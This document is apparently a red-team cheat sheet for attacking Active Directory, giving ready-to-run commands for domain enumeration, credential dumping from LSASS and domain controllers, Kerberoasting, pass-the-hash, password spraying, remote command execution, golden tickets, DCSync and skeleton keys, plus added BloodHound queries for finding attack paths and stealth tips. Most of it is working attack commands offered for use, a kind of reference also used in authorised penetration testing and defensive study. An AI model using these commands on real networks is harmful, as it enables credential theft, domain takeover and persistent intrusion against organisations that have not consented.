Active Directory Tool Cheat Sheet
Your quick-access toolkit for AD Enumeration, Exploitation, Lateral Movement, and Persistence
Table of Contents
- Enumeration Tools
- Credential Access & Extraction
- Privilege Escalation
- Lateral Movement
- Persistence & Post-Exploitation
- BloodHound Query Ideas
1. Enumeration Tools
BloodHound + SharpHound
Graph-based AD attack path discovery and visualization.
SharpHound.exe -c All
ADRecon
Comprehensive domain enumeration with a nice report format.
.\ADRecon.ps1
PowerView (PowerSploit)
PowerShell-based enumeration of users, groups, trusts, ACLs, etc.
Get-DomainUser
Get-DomainGroupMember -Identity "Domain Admins"
Get-NetDomainTrust
ldapsearch (Linux)
LDAP enumeration from Linux. -x selects a simple bind; without -D/-w it is an anonymous bind, which most modern domains reject, so fall back to any low-privileged domain account. OpenLDAP has deprecated -h in favour of a -H URI.
ldapsearch -x -H ldap://<DC-IP> -b "DC=domain,DC=local"
ldapsearch -x -H ldap://<DC-IP> -D "user@domain.local" -w '<password>' -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName
rpcclient & enum4linux-ng
Anonymous (null-session) enumeration of users, groups, shares and password policy over SMB/MS-RPC. Fails on hardened domains that disable null sessions; -N stops rpcclient prompting for a password.
rpcclient -U "" -N <IP>
enum4linux-ng -A <IP>
2. Credential Access & Extraction
Mimikatz
Extract plaintext passwords, NT hashes and Kerberos tickets from LSASS memory. Needs local admin (SeDebugPrivilege via privilege::debug) or SYSTEM; sekurlsa::logonpasswords fails when LSASS runs as a protected process (RunAsPPL) or Credential Guard is enabled.
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
LaZagne
Recover stored credentials from browsers, mail clients, Wi-Fi profiles and other applications on the local host (plus a small set of in-memory sources). Runs in the context of the current user; no domain rights required.
LaZagne.exe all
Impacket: secretsdump.py
Dump SAM and LSA secrets from a host where you have local admin, or the NTDS.dit contents of a DC over DRSUAPI (the same replication call DCSync uses). Add -just-dc-ntlm to pull only NT hashes.
secretsdump.py 'domain/user:password@dc-ip'
secretsdump.py -just-dc-ntlm 'domain/user:password@dc-ip'
Rubeus (Kerberoasting)
Requests service tickets for every user account with an SPN and prints them in hashcat format (mode 13100) for offline cracking. Any authenticated domain user can run it; target a single account with /user:<name> to reduce noise.
Rubeus.exe kerberoast /outfile:hashes.txt
3. Privilege Escalation
Rubeus (TGT & Ticket Attacks)
asktgt with /rc4 is overpass-the-hash: it requests a TGT using only the account's NT hash (use /aes256 where RC4 is disabled), and /ptt injects the ticket into the current logon session. dump lists Kerberos tickets from LSASS and needs elevation to see other users' sessions.
Rubeus.exe asktgt /user:<username> /rc4:<ntlm> /ptt
Rubeus.exe dump
Seatbelt
System enumeration focused on privesc and situational awareness.
.\Seatbelt.exe -group=all
Watson.exe
Privilege escalation checker for Windows.
Watson.exe
SharpHound
Identify privilege abuse paths like WriteDACL, GenericAll, etc.
SharpHound.exe -c ACL
4. Lateral Movement
CrackMapExec (CME)
Swiss Army knife for password spraying, share and session enumeration, and command execution over SMB, WinRM, LDAP and more. CME is archived; NetExec (nxc) is the maintained fork with the same syntax. Check the domain lockout policy before spraying a password list.
cme smb <IP> -u users.txt -p passwords.txt --shares
cme smb <IP> -u admin -p password --exec-method smbexec -x whoami
Impacket: wmiexec.py
Execute commands via WMI remotely.
wmiexec.py domain/user:password@target-ip
Impacket: psexec.py
Gain SYSTEM shell via SMB.
psexec.py domain/user:password@target-ip
Impacket: smbexec.py
Alternative to psexec that does not upload a binary, but it still creates a service per command (event ID 7045 on the target), so it is not stealthy against a monitored host.
smbexec.py domain/user:password@target-ip
Invoke-SMBExec (PowerShell-based, from Invoke-TheHash)
Pass-the-hash command execution over SMB; only the NT hash is needed, no plaintext password.
Invoke-SMBExec -Target <IP> -Domain <domain> -Username <user> -Hash <ntlm> -Command "<cmd>"
5. Persistence & Post-Exploitation
DSInternals
PowerShell module for reading AD database contents, offline from an ntds.dit copy or online via replication, and auditing password quality (duplicate, empty, weak or reversibly encrypted passwords). Online replication requires the same DCSync rights as Mimikatz; Test-PasswordQuality takes account objects on the pipeline rather than a -SamAccountName parameter.
Get-ADReplAccount -All -Server <DC> | Test-PasswordQuality
Golden Ticket (Mimikatz)
Forges a TGT signed with the krbtgt hash; it stays valid until the krbtgt password is reset twice. /sid is the domain SID (no trailing account RID); add /ptt to inject the ticket into the current session.
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXXX /krbtgt:<hash> /ptt
DCSync Attack (Mimikatz)
Pulls account secrets from a DC via the replication protocol (DRSUAPI). Requires the Replicating Directory Changes and Replicating Directory Changes All rights, held by Domain Admins, Enterprise Admins and domain controllers by default; it generates no logon on the DC but is detectable as replication traffic from a non-DC.
lsadump::dcsync /domain:domain.local /user:krbtgt
Skeleton Key Attack
Patches LSASS on a domain controller so that a single master password (Mimikatz default: "mimikatz") is accepted for any domain account alongside the real password. Mimikatz implements it as misc::skeleton; it needs SYSTEM on the DC, does not survive a reboot, and is well known to EDR. Use with caution.
6. BloodHound Query Ideas
Suggested queries once BloodHound data is ingested:
- Shortest paths to Domain Admins
- Users with Kerberoastable services
- Computers with unconstrained delegation
- Accounts with GenericAll or WriteDACL on objects
- Shadow admin accounts
- Users with local admin rights across multiple hosts
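The Cypher below is an added worked example for the six ideas above; it is not part of the original cheat sheet or of BloodHound itself. It uses the legacy BloodHound (v4) node labels, property names and edge types, and assumes a placeholder domain DOMAIN.LOCAL (substitute the upper-cased name of your own domain, as BloodHound stores it). Run each query separately in the Raw Query bar or the Neo4j browser.

```cypher
// Added example queries (not from the original page). Legacy BloodHound v4 schema;
// DOMAIN.LOCAL is an assumed placeholder for the target domain.

// 1. Shortest paths to Domain Admins from any other node, over every edge type
MATCH p = shortestPath((n)-[*1..]->(g:Group {name: "DOMAIN ADMINS@DOMAIN.LOCAL"}))
WHERE NOT n = g
RETURN p

// 2. Kerberoastable users: enabled accounts with an SPN, excluding krbtgt
MATCH (u:User {hasspn: true, enabled: true})
WHERE NOT u.name STARTS WITH "KRBTGT@"
RETURN u.name, u.serviceprincipalnames

// 3. Computers with unconstrained delegation that are not domain controllers
//    (DCs always have it, so they only add noise)
MATCH (dc:Group) WHERE dc.name STARTS WITH "DOMAIN CONTROLLERS@"
MATCH (c:Computer {unconstraineddelegation: true})
WHERE NOT (c)-[:MemberOf*1..]->(dc)
RETURN c.name

// 4. GenericAll / WriteDacl (and the equivalent WriteOwner / Owns) edges whose
//    source is not one of the built-in admin groups
MATCH p = (n)-[r:GenericAll|WriteDacl|WriteOwner|Owns]->(m)
WHERE NOT n.name STARTS WITH "DOMAIN ADMINS@"
  AND NOT n.name STARTS WITH "ENTERPRISE ADMINS@"
RETURN p

// 5. Shadow admins: principals outside Domain Admins that hold an ACL right
//    directly over the DA group or over one of its (transitive) members
MATCH (da:Group {name: "DOMAIN ADMINS@DOMAIN.LOCAL"})
MATCH (n)
WHERE (n:User OR n:Group) AND NOT n = da AND NOT (n)-[:MemberOf*1..]->(da)
MATCH p = (n)-[:GenericAll|GenericWrite|WriteDacl|WriteOwner|Owns|AllExtendedRights|ForceChangePassword|AddMember]->(t)
WHERE t = da OR (t)-[:MemberOf*1..]->(da)
RETURN p

// 6. Users with local admin rights on more than one host, directly or via groups.
//    Path is followed through MemberOf so group-delegated admin rights are counted.
MATCH (u:User)-[:AdminTo|MemberOf*1..]->(c:Computer)
WITH u, count(DISTINCT c) AS hosts
WHERE hosts > 1
RETURN u.name, hosts
ORDER BY hosts DESC
```

Query 1 is expensive on a large graph; constrain the start node (for example `(n:User {owned: true})`) once you have a foothold. BloodHound CE keeps most of these names but changed some property and edge names, so check the schema before pasting these into a CE deployment.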
Tips & Usage Flow
- Start light with built-in tools: net user, nltest, nslookup.
- Use proxychains with CME or BloodHound when pivoting.
- Prefer runas /netonly or Rubeus for alternate credentials.
- Keep enumeration and exploitation separate for stealth.
